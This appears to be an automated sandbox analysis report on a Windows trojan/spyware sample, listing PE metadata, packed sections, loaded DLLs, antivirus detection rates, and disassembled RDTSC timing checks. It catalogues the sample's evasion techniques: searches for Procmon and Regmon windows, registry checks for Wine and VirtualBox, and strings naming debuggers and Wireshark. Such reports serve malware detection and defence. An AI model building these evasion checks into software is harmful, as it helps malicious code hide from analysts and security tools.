Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 00827220 appears 103 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 0068CD40 appears 80 times
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: String function: 006B50A0 appears 101 times
Source: E6rBvcWFWu.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: E6rBvcWFWu.exeStatic PE information: Section: xyfieepk ZLIB complexity 0.9940755390646877
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0067255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0067255D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_006729FF
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: E6rBvcWFWu.exeVirustotal: Detection: 65%
Source: E6rBvcWFWu.exeReversingLabs: Detection: 71%
Source: E6rBvcWFWu.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: E6rBvcWFWu.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeSection loaded: kernel.appcore.dllJump to behavior
Source: E6rBvcWFWu.exeStatic file information: File size 4478464 > 1048576
Source: E6rBvcWFWu.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: E6rBvcWFWu.exeStatic PE information: Raw size of xyfieepk is bigger than: 0x100000 < 0x1be600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeUnpacked PE file: 0.2.E6rBvcWFWu.exe.670000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xyfieepk:EW;lpcplxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xyfieepk:EW;lpcplxjb:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: E6rBvcWFWu.exeStatic PE information: real checksum: 0x44e278 should be: 0x44f8e8
Source: E6rBvcWFWu.exeStatic PE information: section name:
Source: E6rBvcWFWu.exeStatic PE information: section name: .idata
Source: E6rBvcWFWu.exeStatic PE information: section name:
Source: E6rBvcWFWu.exeStatic PE information: section name: xyfieepk
Source: E6rBvcWFWu.exeStatic PE information: section name: lpcplxjb
Source: E6rBvcWFWu.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADABEC push eax; retf 0_3_01ADABF5
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE05E5 pushfd ; ret 0_3_01AE05F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE9FD0 push eax; ret 0_3_01AE9FD1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADF419 push es; retf 0_3_01ADF41A
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE724C push eax; retn 0000h0_3_01AE724D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADABEC push eax; retf 0_3_01ADABF5
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE05E5 pushfd ; ret 0_3_01AE05F0
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE9FD0 push eax; ret 0_3_01AE9FD1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01ADF419 push es; retf 0_3_01ADF41A
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_3_01AE724C push eax; retn 0000h0_3_01AE724D
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009F41D0 push eax; mov dword ptr [esp], edx0_2_009F41D5
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006F2340 push eax; mov dword ptr [esp], 00000000h0_2_006F2343
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_0072C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0072C743
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006B0AC0 push eax; mov dword ptr [esp], 00000000h0_2_006B0AC4
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006D1430 push eax; mov dword ptr [esp], 00000000h0_2_006D1433
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006F39A0 push eax; mov dword ptr [esp], 00000000h0_2_006F39A3
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_006CDAD0 push eax; mov dword ptr [esp], edx0_2_006CDAD1
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeCode function: 0_2_009F9F40 push dword ptr [eax+04h]; ret 0_2_009F9F6F
Source: E6rBvcWFWu.exeStatic PE information: section name: xyfieepk entropy: 7.9542694260581

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: E6rBvcWFWu.exe, 00000000.00000003.1373965243.00000000076F0000.00000004.00001000.00020000.00000000.sdmp, E6rBvcWFWu.exe, 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: DA0105 second address: DA0109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: DA0109 second address: DA010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1B771 second address: F1B791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D6h 0x00000007 jnc 00007F577C5415C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1B8FA second address: F1B8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1B8FE second address: F1B90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1BA77 second address: F1BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1BA7D second address: F1BA87 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F577C5415C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E1EC second address: F1E1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E1F0 second address: F1E242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F577C5415CFh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F577C5415D5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E242 second address: F1E248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E248 second address: F1E263 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e ja 00007F577C5415C6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E263 second address: F1E2FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+12A028B3h] 0x0000000e push 00000003h 0x00000010 mov ecx, dword ptr [ebp+12A02B87h] 0x00000016 push 00000000h 0x00000018 xor dword ptr [ebp+12A03714h], ecx 0x0000001e push 00000003h 0x00000020 push 87071A14h 0x00000025 jmp 00007F577C53EFD0h 0x0000002a add dword ptr [esp], 38F8E5ECh 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F577C53EFC8h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b add edx, dword ptr [ebp+12A02BFBh] 0x00000051 lea ebx, dword ptr [ebp+12B820A3h] 0x00000057 push 00000000h 0x00000059 push esi 0x0000005a call 00007F577C53EFC8h 0x0000005f pop esi 0x00000060 mov dword ptr [esp+04h], esi 0x00000064 add dword ptr [esp+04h], 0000001Ch 0x0000006c inc esi 0x0000006d push esi 0x0000006e ret 0x0000006f pop esi 0x00000070 ret 0x00000071 mov edi, dword ptr [ebp+12A017D8h] 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push esi 0x0000007b push eax 0x0000007c pop eax 0x0000007d pop esi 0x0000007e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E2FA second address: F1E300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E300 second address: F1E304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E429 second address: F1E42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E42D second address: F1E437 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E437 second address: F1E43C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E584 second address: F1E5C9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F577C53EFC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 571D6AE2h 0x00000013 jmp 00007F577C53EFD1h 0x00000018 push 00000003h 0x0000001a mov di, D96Ch 0x0000001e push 00000000h 0x00000020 movzx edi, ax 0x00000023 push 00000003h 0x00000025 cmc 0x00000026 mov cx, DFD7h 0x0000002a push 979B830Ah 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jnc 00007F577C53EFC6h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F1E5C9 second address: F1E5CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3170E second address: F31712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0CEA9 second address: F0CEC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F577C5415C6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D75B second address: F3D75F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D75F second address: F3D768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D768 second address: F3D772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3D919 second address: F3D91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3DA90 second address: F3DAAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F577C53EFE8h 0x0000000f pushad 0x00000010 jng 00007F577C53EFC6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3DAAF second address: F3DABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3DC52 second address: F3DC6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F577C53EFD7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E1C0 second address: F3E1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E1C6 second address: F3E1CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E60B second address: F3E613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E613 second address: F3E61C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E7A5 second address: F3E7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E7B1 second address: F3E7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F36720 second address: F36725 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3E908 second address: F3E912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3EEBB second address: F3EEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3EEC5 second address: F3EED8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F577C53EFC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3F05B second address: F3F067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3F067 second address: F3F06B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F3F388 second address: F3F3A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F577C5415C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0CEA3 second address: F0CEA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F437AA second address: F437B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F438C7 second address: F438DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C53EFD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F16D85 second address: F16DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415D8h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F49E48 second address: F49E5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 js 00007F577C53EFCEh 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F49F9C second address: F49FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F49FA0 second address: F49FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4A0E3 second address: F4A0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F11F22 second address: F11F2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4A6B7 second address: F4A6BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4C947 second address: F4C94D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F4C94D second address: F4C95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415CBh 0x00000009 rdtsc
